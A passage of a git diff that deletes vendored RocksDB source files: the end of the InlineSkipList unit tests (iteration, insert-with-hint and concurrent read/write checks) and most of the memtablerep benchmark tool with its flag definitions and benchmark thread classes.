-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), Decode(iter.key()));
-  }
-
-  // Forward iteration test
-  for (Key i = 0; i < R; i++) {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    iter.Seek(Encode(&i));
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.lower_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.end()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*model_iter, Decode(iter.key()));
-        ++model_iter;
-        iter.Next();
-      }
-    }
-  }
-
-  // Backward iteration test
-  for (Key i = 0; i < R; i++) {
-    InlineSkipList<TestComparator>::Iterator iter(&list);
-    iter.SeekForPrev(Encode(&i));
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.upper_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.begin()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*--model_iter, Decode(iter.key()));
-        iter.Prev();
-      }
-    }
-  }
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_Sequential) {
-  const int N = 100000;
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hint = nullptr;
-  for (int i = 0; i < N; i++) {
-    Key key = i;
-    InsertWithHint(&list, key, &hint);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_MultipleHints) {
-  const int N = 100000;
-  const int S = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hints[S];
-  Key last_key[S];
-  for (int i = 0; i < S; i++) {
-    hints[i] = nullptr;
-    last_key[i] = 0;
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S);
-    Key key = (s << 32) + (++last_key[s]);
-    InsertWithHint(&list, key, &hints[s]);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_MultipleHintsRandom) {
-  const int N = 100000;
-  const int S = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  void* hints[S];
-  for (int i = 0; i < S; i++) {
-    hints[i] = nullptr;
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S);
-    Key key = (s << 32) + rnd.Next();
-    InsertWithHint(&list, key, &hints[s]);
-  }
-  Validate(&list);
-}
-
-TEST_F(InlineSkipTest, InsertWithHint_CompatibleWithInsertWithoutHint) {
-  const int N = 100000;
-  const int S1 = 100;
-  const int S2 = 100;
-  Random rnd(534);
-  Arena arena;
-  TestComparator cmp;
-  TestInlineSkipList list(cmp, &arena);
-  std::unordered_set<Key> used;
-  Key with_hint[S1];
-  Key without_hint[S2];
-  void* hints[S1];
-  for (int i = 0; i < S1; i++) {
-    hints[i] = nullptr;
-    while (true) {
-      Key s = rnd.Next();
-      if (used.insert(s).second) {
-        with_hint[i] = s;
-        break;
-      }
-    }
-  }
-  for (int i = 0; i < S2; i++) {
-    while (true) {
-      Key s = rnd.Next();
-      if (used.insert(s).second) {
-        without_hint[i] = s;
-        break;
-      }
-    }
-  }
-  for (int i = 0; i < N; i++) {
-    Key s = rnd.Uniform(S1 + S2);
-    if (s < S1) {
-      Key key = (with_hint[s] << 32) + rnd.Next();
-      InsertWithHint(&list, key, &hints[s]);
-    } else {
-      Key key = (without_hint[s - S1] << 32) + rnd.Next();
-      Insert(&list, key);
-    }
-  }
-  Validate(&list);
-}
-
-// We want to make sure that with a single writer and multiple
-// concurrent readers (with no synchronization other than when a
-// reader's iterator is created), the reader always observes all the
-// data that was present in the skip list when the iterator was
-// constructor.  Because insertions are happening concurrently, we may
-// also observe new values that were inserted since the iterator was
-// constructed, but we should never miss any values that were present
-// at iterator construction time.
-//
-// We generate multi-part keys:
-//     <key,gen,hash>
-// where:
-//     key is in range [0..K-1]
-//     gen is a generation number for key
-//     hash is hash(key,gen)
-//
-// The insertion code picks a random key, sets gen to be 1 + the last
-// generation number inserted for that key, and sets hash to Hash(key,gen).
-//
-// At the beginning of a read, we snapshot the last inserted
-// generation number for each key.  We then iterate, including random
-// calls to Next() and Seek().  For every key we encounter, we
-// check that it is either expected given the initial snapshot or has
-// been concurrently added since the iterator started.
-class ConcurrentTest {
- public:
-  static const uint32_t K = 8;
-
- private:
-  static uint64_t key(Key key) { return (key >> 40); }
-  static uint64_t gen(Key key) { return (key >> 8) & 0xffffffffu; }
-  static uint64_t hash(Key key) { return key & 0xff; }
-
-  static uint64_t HashNumbers(uint64_t k, uint64_t g) {
-    uint64_t data[2] = {k, g};
-    return Hash(reinterpret_cast<char*>(data), sizeof(data), 0);
-  }
-
-  static Key MakeKey(uint64_t k, uint64_t g) {
-    assert(sizeof(Key) == sizeof(uint64_t));
-    assert(k <= K);  // We sometimes pass K to seek to the end of the skiplist
-    assert(g <= 0xffffffffu);
-    return ((k << 40) | (g << 8) | (HashNumbers(k, g) & 0xff));
-  }
-
-  static bool IsValidKey(Key k) {
-    return hash(k) == (HashNumbers(key(k), gen(k)) & 0xff);
-  }
-
-  static Key RandomTarget(Random* rnd) {
-    switch (rnd->Next() % 10) {
-      case 0:
-        // Seek to beginning
-        return MakeKey(0, 0);
-      case 1:
-        // Seek to end
-        return MakeKey(K, 0);
-      default:
-        // Seek to middle
-        return MakeKey(rnd->Next() % K, 0);
-    }
-  }
-
-  // Per-key generation
-  struct State {
-    std::atomic<int> generation[K];
-    void Set(int k, int v) {
-      generation[k].store(v, std::memory_order_release);
-    }
-    int Get(int k) { return generation[k].load(std::memory_order_acquire); }
-
-    State() {
-      for (unsigned int k = 0; k < K; k++) {
-        Set(k, 0);
-      }
-    }
-  };
-
-  // Current state of the test
-  State current_;
-
-  ConcurrentArena arena_;
-
-  // InlineSkipList is not protected by mu_.  We just use a single writer
-  // thread to modify it.
-  InlineSkipList<TestComparator> list_;
-
- public:
-  ConcurrentTest() : list_(TestComparator(), &arena_) {}
-
-  // REQUIRES: No concurrent calls to WriteStep or ConcurrentWriteStep
-  void WriteStep(Random* rnd) {
-    const uint32_t k = rnd->Next() % K;
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    char* buf = list_.AllocateKey(sizeof(Key));
-    memcpy(buf, &new_key, sizeof(Key));
-    list_.Insert(buf);
-    current_.Set(k, g);
-  }
-
-  // REQUIRES: No concurrent calls for the same k
-  void ConcurrentWriteStep(uint32_t k) {
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    char* buf = list_.AllocateKey(sizeof(Key));
-    memcpy(buf, &new_key, sizeof(Key));
-    list_.InsertConcurrently(buf);
-    ASSERT_EQ(g, current_.Get(k) + 1);
-    current_.Set(k, g);
-  }
-
-  void ReadStep(Random* rnd) {
-    // Remember the initial committed state of the skiplist.
-    State initial_state;
-    for (unsigned int k = 0; k < K; k++) {
-      initial_state.Set(k, current_.Get(k));
-    }
-
-    Key pos = RandomTarget(rnd);
-    InlineSkipList<TestComparator>::Iterator iter(&list_);
-    iter.Seek(Encode(&pos));
-    while (true) {
-      Key current;
-      if (!iter.Valid()) {
-        current = MakeKey(K, 0);
-      } else {
-        current = Decode(iter.key());
-        ASSERT_TRUE(IsValidKey(current)) << current;
-      }
-      ASSERT_LE(pos, current) << "should not go backwards";
-
-      // Verify that everything in [pos,current) was not present in
-      // initial_state.
-      while (pos < current) {
-        ASSERT_LT(key(pos), K) << pos;
-
-        // Note that generation 0 is never inserted, so it is ok if
-        // <*,0,*> is missing.
-        ASSERT_TRUE((gen(pos) == 0U) ||
-                    (gen(pos) > static_cast<uint64_t>(initial_state.Get(
-                                    static_cast<int>(key(pos))))))
-            << "key: " << key(pos) << "; gen: " << gen(pos)
-            << "; initgen: " << initial_state.Get(static_cast<int>(key(pos)));
-
-        // Advance to next key in the valid key space
-        if (key(pos) < key(current)) {
-          pos = MakeKey(key(pos) + 1, 0);
-        } else {
-          pos = MakeKey(key(pos), gen(pos) + 1);
-        }
-      }
-
-      if (!iter.Valid()) {
-        break;
-      }
-
-      if (rnd->Next() % 2) {
-        iter.Next();
-        pos = MakeKey(key(pos), gen(pos) + 1);
-      } else {
-        Key new_target = RandomTarget(rnd);
-        if (new_target > pos) {
-          pos = new_target;
-          iter.Seek(Encode(&new_target));
-        }
-      }
-    }
-  }
-};
-const uint32_t ConcurrentTest::K;
-
-// Simple test that does single-threaded testing of the ConcurrentTest
-// scaffolding.
-TEST_F(InlineSkipTest, ConcurrentReadWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    test.WriteStep(&rnd);
-  }
-}
-
-TEST_F(InlineSkipTest, ConcurrentInsertWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    uint32_t base = rnd.Next();
-    for (int j = 0; j < 4; ++j) {
-      test.ConcurrentWriteStep((base + j) % ConcurrentTest::K);
-    }
-  }
-}
-
-class TestState {
- public:
-  ConcurrentTest t_;
-  int seed_;
-  std::atomic<bool> quit_flag_;
-  std::atomic<uint32_t> next_writer_;
-
-  enum ReaderState { STARTING, RUNNING, DONE };
-
-  explicit TestState(int s)
-      : seed_(s),
-        quit_flag_(false),
-        state_(STARTING),
-        pending_writers_(0),
-        state_cv_(&mu_) {}
-
-  void Wait(ReaderState s) {
-    mu_.Lock();
-    while (state_ != s) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
-  void Change(ReaderState s) {
-    mu_.Lock();
-    state_ = s;
-    state_cv_.Signal();
-    mu_.Unlock();
-  }
-
-  void AdjustPendingWriters(int delta) {
-    mu_.Lock();
-    pending_writers_ += delta;
-    if (pending_writers_ == 0) {
-      state_cv_.Signal();
-    }
-    mu_.Unlock();
-  }
-
-  void WaitForPendingWriters() {
-    mu_.Lock();
-    while (pending_writers_ != 0) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
- private:
-  port::Mutex mu_;
-  ReaderState state_;
-  int pending_writers_;
-  port::CondVar state_cv_;
-};
-
-static void ConcurrentReader(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  Random rnd(state->seed_);
-  int64_t reads = 0;
-  state->Change(TestState::RUNNING);
-  while (!state->quit_flag_.load(std::memory_order_acquire)) {
-    state->t_.ReadStep(&rnd);
-    ++reads;
-  }
-  state->Change(TestState::DONE);
-}
-
-static void ConcurrentWriter(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  uint32_t k = state->next_writer_++ % ConcurrentTest::K;
-  state->t_.ConcurrentWriteStep(k);
-  state->AdjustPendingWriters(-1);
-}
-
-static void RunConcurrentRead(int run) {
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->SetBackgroundThreads(1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; ++k) {
-      state.t_.WriteStep(&rnd);
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-static void RunConcurrentInsert(int run, int write_parallelism = 4) {
-  Env::Default()->SetBackgroundThreads(1 + write_parallelism,
-                                       Env::Priority::LOW);
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; k += write_parallelism) {
-      state.next_writer_ = rnd.Next();
-      state.AdjustPendingWriters(write_parallelism);
-      for (int p = 0; p < write_parallelism; ++p) {
-        Env::Default()->Schedule(ConcurrentWriter, &state);
-      }
-      state.WaitForPendingWriters();
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-TEST_F(InlineSkipTest, ConcurrentRead1) { RunConcurrentRead(1); }
-TEST_F(InlineSkipTest, ConcurrentRead2) { RunConcurrentRead(2); }
-TEST_F(InlineSkipTest, ConcurrentRead3) { RunConcurrentRead(3); }
-TEST_F(InlineSkipTest, ConcurrentRead4) { RunConcurrentRead(4); }
-TEST_F(InlineSkipTest, ConcurrentRead5) { RunConcurrentRead(5); }
-TEST_F(InlineSkipTest, ConcurrentInsert1) { RunConcurrentInsert(1); }
-TEST_F(InlineSkipTest, ConcurrentInsert2) { RunConcurrentInsert(2); }
-TEST_F(InlineSkipTest, ConcurrentInsert3) { RunConcurrentInsert(3); }
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/memtable/memtablerep_bench.cc b/thirdparty/rocksdb/memtable/memtablerep_bench.cc
deleted file mode 100644
index 63a0201..0000000
--- a/thirdparty/rocksdb/memtable/memtablerep_bench.cc
+++ /dev/null
@@ -1,698 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include <atomic>
-#include <iostream>
-#include <memory>
-#include <thread>
-#include <type_traits>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "util/arena.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(benchmarks, "fillrandom",
-              "Comma-separated list of benchmarks to run. Options:\n"
-              "\tfillrandom             -- write N random values\n"
-              "\tfillseq                -- write N values in sequential order\n"
-              "\treadrandom             -- read N values in random order\n"
-              "\treadseq                -- scan the DB\n"
-              "\treadwrite              -- 1 thread writes while N - 1 threads "
-              "do random\n"
-              "\t                          reads\n"
-              "\tseqreadwrite           -- 1 thread writes while N - 1 threads "
-              "do scans\n");
-
-DEFINE_string(memtablerep, "skiplist",
-              "Which implementation of memtablerep to use. See "
-              "include/memtablerep.h for\n"
-              "  more details. Options:\n"
-              "\tskiplist            -- backed by a skiplist\n"
-              "\tvector              -- backed by an std::vector\n"
-              "\thashskiplist        -- backed by a hash skip list\n"
-              "\thashlinklist        -- backed by a hash linked list\n"
-              "\tcuckoo              -- backed by a cuckoo hash table");
-
-DEFINE_int64(bucket_count, 1000000,
-             "bucket_count parameter to pass into NewHashSkiplistRepFactory or "
-             "NewHashLinkListRepFactory");
-
-DEFINE_int32(
-    hashskiplist_height, 4,
-    "skiplist_height parameter to pass into NewHashSkiplistRepFactory");
-
-DEFINE_int32(
-    hashskiplist_branching_factor, 4,
-    "branching_factor parameter to pass into NewHashSkiplistRepFactory");
-
-DEFINE_int32(
-    huge_page_tlb_size, 0,
-    "huge_page_tlb_size parameter to pass into NewHashLinkListRepFactory");
-
-DEFINE_int32(bucket_entries_logging_threshold, 4096,
-             "bucket_entries_logging_threshold parameter to pass into "
-             "NewHashLinkListRepFactory");
-
-DEFINE_bool(if_log_bucket_dist_when_flash, true,
-            "if_log_bucket_dist_when_flash parameter to pass into "
-            "NewHashLinkListRepFactory");
-
-DEFINE_int32(
-    threshold_use_skiplist, 256,
-    "threshold_use_skiplist parameter to pass into NewHashLinkListRepFactory");
-
-DEFINE_int64(
-    write_buffer_size, 256,
-    "write_buffer_size parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int64(
-    average_data_size, 64,
-    "average_data_size parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int64(
-    hash_function_count, 4,
-    "hash_function_count parameter to pass into NewHashCuckooRepFactory");
-
-DEFINE_int32(
-    num_threads, 1,
-    "Number of concurrent threads to run. If the benchmark includes writes,\n"
-    "then at most one thread will be a writer");
-
-DEFINE_int32(num_operations, 1000000,
-             "Number of operations to do for write and random read benchmarks");
-
-DEFINE_int32(num_scans, 10,
-             "Number of times for each thread to scan the memtablerep for "
-             "sequential read "
-             "benchmarks");
-
-DEFINE_int32(item_size, 100, "Number of bytes each item should be");
-
-DEFINE_int32(prefix_length, 8,
-             "Prefix length to pass into NewFixedPrefixTransform");
-
-/* VectorRep settings */
-DEFINE_int64(vectorrep_count, 0,
-             "Number of entries to reserve on VectorRep initialization");
-
-DEFINE_int64(seed, 0,
-             "Seed base for random number generators. "
-             "When 0 it is deterministic.");
-
-namespace rocksdb {
-
-namespace {
-struct CallbackVerifyArgs {
-  bool found;
-  LookupKey* key;
-  MemTableRep* table;
-  InternalKeyComparator* comparator;
-};
-}  // namespace
-
-// Helper for quickly generating random data.
-class RandomGenerator {
- private:
-  std::string data_;
-  unsigned int pos_;
-
- public:
-  RandomGenerator() {
-    Random rnd(301);
-    auto size = (unsigned)std::max(1048576, FLAGS_item_size);
-    test::RandomString(&rnd, size, &data_);
-    pos_ = 0;
-  }
-
-  Slice Generate(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-};
-
-enum WriteMode { SEQUENTIAL, RANDOM, UNIQUE_RANDOM };
-
-class KeyGenerator {
- public:
-  KeyGenerator(Random64* rand, WriteMode mode, uint64_t num)
-      : rand_(rand), mode_(mode), num_(num), next_(0) {
-    if (mode_ == UNIQUE_RANDOM) {
-      // NOTE: if memory consumption of this approach becomes a concern,
-      // we can either break it into pieces and only random shuffle a section
-      // each time. Alternatively, use a bit map implementation
-      // (https://reviews.facebook.net/differential/diff/54627/)
-      values_.resize(num_);
-      for (uint64_t i = 0; i < num_; ++i) {
-        values_[i] = i;
-      }
-      std::shuffle(
-          values_.begin(), values_.end(),
-          std::default_random_engine(static_cast<unsigned int>(FLAGS_seed)));
-    }
-  }
-
-  uint64_t Next() {
-    switch (mode_) {
-      case SEQUENTIAL:
-        return next_++;
-      case RANDOM:
-        return rand_->Next() % num_;
-      case UNIQUE_RANDOM:
-        return values_[next_++];
-    }
-    assert(false);
-    return std::numeric_limits<uint64_t>::max();
-  }
-
- private:
-  Random64* rand_;
-  WriteMode mode_;
-  const uint64_t num_;
-  uint64_t next_;
-  std::vector<uint64_t> values_;
-};
-
-class BenchmarkThread {
- public:
-  explicit BenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                           uint64_t* bytes_written, uint64_t* bytes_read,
-                           uint64_t* sequence, uint64_t num_ops,
-                           uint64_t* read_hits)
-      : table_(table),
-        key_gen_(key_gen),
-        bytes_written_(bytes_written),
-        bytes_read_(bytes_read),
-        sequence_(sequence),
-        num_ops_(num_ops),
-        read_hits_(read_hits) {}
-
-  virtual void operator()() = 0;
-  virtual ~BenchmarkThread() {}
-
- protected:
-  MemTableRep* table_;
-  KeyGenerator* key_gen_;
-  uint64_t* bytes_written_;
-  uint64_t* bytes_read_;
-  uint64_t* sequence_;
-  uint64_t num_ops_;
-  uint64_t* read_hits_;
-  RandomGenerator generator_;
-};
-
-class FillBenchmarkThread : public BenchmarkThread {
- public:
-  FillBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                      uint64_t* bytes_written, uint64_t* bytes_read,
-                      uint64_t* sequence, uint64_t num_ops, uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  void FillOne() {
-    char* buf = nullptr;
-    auto internal_key_size = 16;
-    auto encoded_len =
-        FLAGS_item_size + VarintLength(internal_key_size) + internal_key_size;
-    KeyHandle handle = table_->Allocate(encoded_len, &buf);
-    assert(buf != nullptr);
-    char* p = EncodeVarint32(buf, internal_key_size);
-    auto key = key_gen_->Next();
-    EncodeFixed64(p, key);
-    p += 8;
-    EncodeFixed64(p, ++(*sequence_));
-    p += 8;
-    Slice bytes = generator_.Generate(FLAGS_item_size);
-    memcpy(p, bytes.data(), FLAGS_item_size);
-    p += FLAGS_item_size;
-    assert(p == buf + encoded_len);
-    table_->Insert(handle);
-    *bytes_written_ += encoded_len;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      FillOne();
-    }
-  }
-};
-
-class ConcurrentFillBenchmarkThread : public FillBenchmarkThread {
- public:
-  ConcurrentFillBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                uint64_t* bytes_written, uint64_t* bytes_read,
-                                uint64_t* sequence, uint64_t num_ops,
-                                uint64_t* read_hits,
-                                std::atomic_int* threads_done)
-      : FillBenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                            num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    // # of read threads will be total threads - write threads (always 1). Loop
-    // while all reads complete.
-    while ((*threads_done_).load() < (FLAGS_num_threads - 1)) {
-      FillOne();
-    }
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class ReadBenchmarkThread : public BenchmarkThread {
- public:
-  ReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                      uint64_t* bytes_written, uint64_t* bytes_read,
-                      uint64_t* sequence, uint64_t num_ops, uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  static bool callback(void* arg, const char* entry) {
-    CallbackVerifyArgs* callback_args = static_cast<CallbackVerifyArgs*>(arg);
-    assert(callback_args != nullptr);
-    uint32_t key_length;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if ((callback_args->comparator)
-            ->user_comparator()
-            ->Equal(Slice(key_ptr, key_length - 8),
-                    callback_args->key->user_key())) {
-      callback_args->found = true;
-    }
-    return false;
-  }
-
-  void ReadOne() {
-    std::string user_key;
-    auto key = key_gen_->Next();
-    PutFixed64(&user_key, key);
-    LookupKey lookup_key(user_key, *sequence_);
-    InternalKeyComparator internal_key_comp(BytewiseComparator());
-    CallbackVerifyArgs verify_args;
-    verify_args.found = false;
-    verify_args.key = &lookup_key;
-    verify_args.table = table_;
-    verify_args.comparator = &internal_key_comp;
-    table_->Get(lookup_key, &verify_args, callback);
-    if (verify_args.found) {
-      *bytes_read_ += VarintLength(16) + 16 + FLAGS_item_size;
-      ++*read_hits_;
-    }
-  }
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOne();
-    }
-  }
-};
-
-class SeqReadBenchmarkThread : public BenchmarkThread {
- public:
-  SeqReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* bytes_written, uint64_t* bytes_read,
-                         uint64_t* sequence, uint64_t num_ops,
-                         uint64_t* read_hits)
-      : BenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                        num_ops, read_hits) {}
-
-  void ReadOneSeq() {
-    std::unique_ptr<MemTableRep::Iterator> iter(table_->GetIterator());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      // pretend to read the value
-      *bytes_read_ += VarintLength(16) + 16 + FLAGS_item_size;
-    }
-    ++*read_hits_;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      { ReadOneSeq(); }
-    }
-  }
-};
-
-class ConcurrentReadBenchmarkThread : public ReadBenchmarkThread {
- public:
-  ConcurrentReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                uint64_t* bytes_written, uint64_t* bytes_read,
-                                uint64_t* sequence, uint64_t num_ops,
-                                uint64_t* read_hits,
-                                std::atomic_int* threads_done)
-      : ReadBenchmarkThread(table, key_gen, bytes_written, bytes_read, sequence,
-                            num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOne();
-    }
-    ++*threads_done_;
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class SeqConcurrentReadBenchmarkThread : public SeqReadBenchmarkThread {
- public:
-  SeqConcurrentReadBenchmarkThread(MemTableRep* table, KeyGenerator* key_gen,
-                                   uint64_t* bytes_written,
-                                   uint64_t* bytes_read, uint64_t* sequence,
-                                   uint64_t num_ops, uint64_t* read_hits,
-                                   std::atomic_int* threads_done)
-      : SeqReadBenchmarkThread(table, key_gen, bytes_written, bytes_read,
-                               sequence, num_ops, read_hits) {
-    threads_done_ = threads_done;
-  }
-
-  void operator()() override {
-    for (unsigned int i = 0; i < num_ops_; ++i) {
-      ReadOneSeq();
-    }
-    ++*threads_done_;
-  }
-
- private:
-  std::atomic_int* threads_done_;
-};
-
-class Benchmark {
- public:
-  explicit Benchmark(MemTableRep* table, KeyGenerator* key_gen,
-                     uint64_t* sequence, uint32_t num_threads)
-      : table_(table),
-        key_gen_(key_gen),
-        sequence_(sequence),
-        num_threads_(num_threads) {}
-
-  virtual ~Benchmark() {}
-  virtual void Run() {
-    std::cout << "Number of threads: " << num_threads_ << std::endl;
-    std::vector<port::Thread> threads;
-    uint64_t bytes_written = 0;
-    uint64_t bytes_read = 0;
-    uint64_t read_hits = 0;
-    StopWatchNano timer(Env::Default(), true);
-    RunThreads(&threads, &bytes_written, &bytes_read, true, &read_hits);
-    auto elapsed_time = static_cast<double>(timer.ElapsedNanos() / 1000);
-    std::cout << "Elapsed time: " << static_cast<int>(elapsed_time) << " us"
-              << std::endl;
-
-    if (bytes_written > 0) {
-      auto MiB_written = static_cast<double>(bytes_written) / (1 << 20);
-      auto write_throughput = MiB_written / (elapsed_time / 1000000);
-      std::cout << "Total bytes written: " << MiB_written << " MiB"
-                << std::endl;
-      std::cout << "Write throughput: " << write_throughput << " MiB/s"
-                << std::endl;
-      auto us_per_op = elapsed_time / num_write_ops_per_thread_;
-      std::cout << "write us/op: " << us_per_op << std::endl;
-    }
-    if (bytes_read > 0) {
-      auto MiB_read = static_cast<double>(bytes_read) / (1 << 20);
-      auto read_throughput = MiB_read / (elapsed_time / 1000000);
-      std::cout << "Total bytes read: " << MiB_read << " MiB" << std::endl;
-      std::cout << "Read throughput: " << read_throughput << " MiB/s"
-                << std::endl;
-      auto us_per_op = elapsed_time / num_read_ops_per_thread_;
-      std::cout << "read us/op: " << us_per_op << std::endl;
-    }
-  }
-
-  virtual void RunThreads(std::vector<port::Thread>* threads,
-                          uint64_t* bytes_written, uint64_t* bytes_read,
-                          bool write, uint64_t* read_hits) = 0;
-
- protected:
-  MemTableRep* table_;
-  KeyGenerator* key_gen_;
-  uint64_t* sequence_;
-  uint64_t num_write_ops_per_thread_;
-  uint64_t num_read_ops_per_thread_;
-  const uint32_t num_threads_;
-};
-
-class FillBenchmark : public Benchmark {
- public:
-  explicit FillBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, 1) {
-    num_write_ops_per_thread_ = FLAGS_num_operations;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    FillBenchmarkThread(table_, key_gen_, bytes_written, bytes_read, sequence_,
-                        num_write_ops_per_thread_, read_hits)();
-  }
-};
-
-class ReadBenchmark : public Benchmark {
- public:
-  explicit ReadBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                         uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ = FLAGS_num_operations / FLAGS_num_threads;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    for (int i = 0; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(
-          ReadBenchmarkThread(table_, key_gen_, bytes_written, bytes_read,
-                              sequence_, num_read_ops_per_thread_, read_hits));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-    std::cout << "read hit%: "
-              << (static_cast<double>(*read_hits) / FLAGS_num_operations) * 100
-              << std::endl;
-  }
-};
-
-class SeqReadBenchmark : public Benchmark {
- public:
-  explicit SeqReadBenchmark(MemTableRep* table, uint64_t* sequence)
-      : Benchmark(table, nullptr, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ = FLAGS_num_scans;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
